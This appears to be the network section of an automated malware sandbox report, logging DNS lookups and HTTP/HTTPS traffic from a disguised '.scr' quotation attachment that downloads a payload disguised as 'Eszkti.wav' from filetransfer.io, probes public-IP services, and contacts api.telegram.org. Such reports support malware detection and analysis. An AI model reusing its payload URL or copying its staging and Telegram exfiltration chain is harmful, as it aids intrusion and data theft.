Jul 27, 2024 11:02:10.075076103 CEST	63107	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:02:10.082847118 CEST	53	63107	1.1.1.1	192.168.2.4
Jul 27, 2024 11:02:29.507000923 CEST	58922	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:02:29.514285088 CEST	53	58922	1.1.1.1	192.168.2.4
Jul 27, 2024 11:02:36.274151087 CEST	60241	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:02:36.705961943 CEST	53	60241	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 11:01:09.568922043 CEST	192.168.2.4	1.1.1.1	0x79be	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:11.413727999 CEST	192.168.2.4	1.1.1.1	0x7531	Standard query (0)	s22.filetransfer.io	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:07.333765984 CEST	192.168.2.4	1.1.1.1	0x868b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:10.075076103 CEST	192.168.2.4	1.1.1.1	0x4a46	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:29.507000923 CEST	192.168.2.4	1.1.1.1	0xfe0c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:36.274151087 CEST	192.168.2.4	1.1.1.1	0x6dfb	Standard query (0)	investms.vadavo.cloud	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 11:01:09.576827049 CEST	1.1.1.1	192.168.2.4	0x79be	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:09.576827049 CEST	1.1.1.1	192.168.2.4	0x79be	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:11.425360918 CEST	1.1.1.1	192.168.2.4	0x7531	No error (0)	s22.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:11.425360918 CEST	1.1.1.1	192.168.2.4	0x7531	No error (0)	s22.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:18.263099909 CEST	1.1.1.1	192.168.2.4	0x7c1a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:18.263099909 CEST	1.1.1.1	192.168.2.4	0x7c1a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:01:19.681617975 CEST	1.1.1.1	192.168.2.4	0x8a68	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:01:19.681617975 CEST	1.1.1.1	192.168.2.4	0x8a68	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:07.341960907 CEST	1.1.1.1	192.168.2.4	0x868b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:02:07.341960907 CEST	1.1.1.1	192.168.2.4	0x868b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:07.341960907 CEST	1.1.1.1	192.168.2.4	0x868b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:07.341960907 CEST	1.1.1.1	192.168.2.4	0x868b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:07.341960907 CEST	1.1.1.1	192.168.2.4	0x868b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:07.341960907 CEST	1.1.1.1	192.168.2.4	0x868b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:10.082847118 CEST	1.1.1.1	192.168.2.4	0x4a46	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:10.082847118 CEST	1.1.1.1	192.168.2.4	0x4a46	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:29.514285088 CEST	1.1.1.1	192.168.2.4	0xfe0c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:02:36.705961943 CEST	1.1.1.1	192.168.2.4	0x6dfb	No error (0)	investms.vadavo.cloud		185.123.204.162	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s22.filetransfer.io

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	80	7404	C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:01:09.594172955 CEST	95	OUT	GET /data-package/v4mecse6/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Jul 27, 2024 11:01:10.268465042 CEST	818	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 27 Jul 2024 09:01:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/v4mecse6/download CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PzFVRtXv2pyeu2z4vLC4410NUwTEiXEtnVptfqtQJCtx6PV6DkNjuFiJJSAa6F%2FXCQ5p0YCBaLZ8lZ%2BwkB6WROF%2FAlgFpUYpG44Ujc0waWsq6O25kJ7q2ns3XGLCJGBVy48%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b71799e242365-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:07.353291988 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:08.996977091 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 27, 2024 11:02:09.004376888 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 27, 2024 11:02:09.898679972 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 27, 2024 11:02:11.250312090 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 27, 2024 11:02:12.381968975 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:13.056056023 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 27, 2024 11:02:14.324662924 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:14.926312923 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:16.867455959 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:17.497003078 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:20.088751078 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:20.709655046 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:21.570044041 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:22.238229990 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:24.130825996 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:24.780946016 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:26.591378927 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	132.226.8.169	80	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:02:27.246714115 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 27, 2024 11:02:28.870507956 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 27, 2024 11:02:28.870567083 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 27, 2024 11:02:28.871113062 CEST	272	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.96.3	443	7404	C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:01:10 UTC	95	OUT	GET /data-package/v4mecse6/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
2024-07-27 09:01:11 UTC	1061	IN	HTTP/1.1 302 Found Date: Sat, 27 Jul 2024 09:01:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Nette Framework 3 X-Frame-Options: SAMEORIGIN Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=de6247bto91c5vthb8knu3417k; expires=Sat, 10-Aug-2024 09:01:11 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: X-Requested-With Location: https://s22.filetransfer.io/storage/download/iiz1WoiTc5zb CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4x9XrPUl1NiVHMoDGBm0E%2B9GXv8kyXf6Nfbn40GdsQUcAw4ix4mcN64gd%2B8rGPX5xlkdO0g9eYN%2BRTatXvj3Fjdflc41RmkM0q%2BHU5lh%2F8ts%2FqFV9MAeTugkpGP%2BXGIpPEM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b717f0bda192c-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:01:11 UTC	134	IN	Data Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 32 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 69 69 7a 31 57 6f 69 54 63 35 7a 62 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a Data Ascii: 80<h1>Redirect</h1><p><a href="https://s22.filetransfer.io/storage/download/iiz1WoiTc5zb">Please click here to continue</a>.</p>
2024-07-27 09:01:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.97.3	443	7404	C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:01:11 UTC	98	OUT	GET /storage/download/iiz1WoiTc5zb HTTP/1.1 Host: s22.filetransfer.io Connection: Keep-Alive
2024-07-27 09:01:12 UTC	1055	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:01:12 GMT Content-Type: application/octet-stream Content-Length: 859200 Connection: close Last-Modified: Sat, 27 Jul 2024 06:34:31 GMT Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly Set-Cookie: PHPSESSID=80afc1ddc6dc7c618ebb84bbe9e6e9b1; expires=Sat, 10-Aug-2024 09:01:12 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Disposition: attachment; filename="Eszkti.wav" Accept-Ranges: bytes Accept-Ranges: bytes ETag: "66a494f7-d1c40" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQE4HBsWe%2BxDtVYpH9k%2BpD1WViaecep0jyq7I2n5dL3OuaIWVVRshqdcP4phn7mHuIXRtmj4bQziMeXk6mY6WQpj8TZRoRAiD6yR9sSgUZs1TcRTFEDjyGcK%2F9Lps3S%2B70X%2FKU9r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b7185faec7c84-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:01:12 UTC	314	IN	Data Raw: f0 7e 46 bf 7e 12 45 7b ee 6b 17 ec 7a 80 3f 3c 50 4c db 93 01 44 4d 41 12 ac 84 d1 b0 9b 0c 0f 86 7a ad c9 7c ad 73 0a fc c7 1c 10 03 ca b5 80 c5 33 bf 4b 29 fe d7 c9 a3 29 c3 49 7a 7f a1 77 b4 bb fc 3d ed 8c 4f 7f af ad c4 41 e0 a5 f9 52 22 9b 4c 29 73 60 37 2c 93 e5 91 9a 0b 2a 01 47 bf 51 1e c5 87 c9 77 65 96 fe ad c5 37 3c b7 7f b0 b5 a2 45 db c4 4b 98 64 ce 3b cf 2a fb 2b 8e 21 46 19 c6 22 0b 39 7c a9 54 7b ba 8e 54 ae 3a 3c 9b c0 62 02 85 75 bc 4e 3e 0a 05 c2 a2 82 d7 21 48 2c e7 42 c1 87 60 ba 6d 2d 15 74 ef 1e 23 9e 9e d0 81 dc 91 ea d0 34 a1 cb 61 f6 0f 1d 4a bd d4 1e 2b 6b c8 15 2e a9 e3 7d ce eb d9 3e 9b 5d 02 d3 de d4 19 ed 0c 6d 93 f7 fa ff bd 8c da 33 63 77 04 48 c6 6c 87 f5 87 fe 47 fd ad 1c 45 91 5c fe f8 cb b0 37 3d ab ba 1f fc e5 97 2d Data Ascii: ~F~E{kz?<PLDMAz\|s3K))Izw=OAR"L)s`7,GQwe7<EKd;+!F"9\|T{T:<buN>!H,B`m-t#4aJ+k.}>]m3cwHlGE\7=-
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 9d e2 25 90 e8 1f 0f 1a 1f 84 45 0b 05 44 5f da 80 38 d9 b1 55 e1 66 78 da df 22 1b a4 14 bc cd 3d 57 90 69 fa c6 ee fa 69 87 a9 08 a0 57 77 e8 8e e7 82 08 ae e4 a0 8d 8b 74 70 88 a5 32 6f fe e8 4d 27 aa 09 d3 e6 13 1c c6 2b 15 62 13 a5 25 36 f5 95 a3 91 15 03 b4 b5 11 e9 af 2e cc 07 3b 7a 2d f8 c1 02 e4 5d 2b 0e 97 c2 d5 d8 c8 0a 85 50 f8 11 9a c1 06 0f ec 16 31 33 95 f6 7a 84 74 58 9d a1 10 3d b6 07 a1 2e ea fe f6 ba 1a 1d 36 cf c5 30 62 36 d5 13 32 38 00 37 1b e5 c7 f1 d9 db 1b c7 77 ff 78 4a 5a 2d 8e 24 48 a9 77 99 a0 41 0d 24 f8 33 e4 b3 70 3e e6 fa a7 76 cb d3 f6 a0 f8 8c 91 c0 47 91 df 4e 1c 0f 38 04 1c bc ca 8c c8 ce 7d ff 21 cd 60 1f 75 d3 a0 ee af 88 f9 8b 57 2b 54 ca 45 7f d3 f5 64 a7 8d 07 88 75 8a f9 0c 43 ca c0 79 36 33 62 5c fc d7 8d da 69 Data Ascii: %ED_8Ufx"=WiiWwtp2oM'+b%6.;z-]+P13ztX=.60b6287wxJZ-$HwA$3p>vGN8}!`uW+TEduCy63b\i
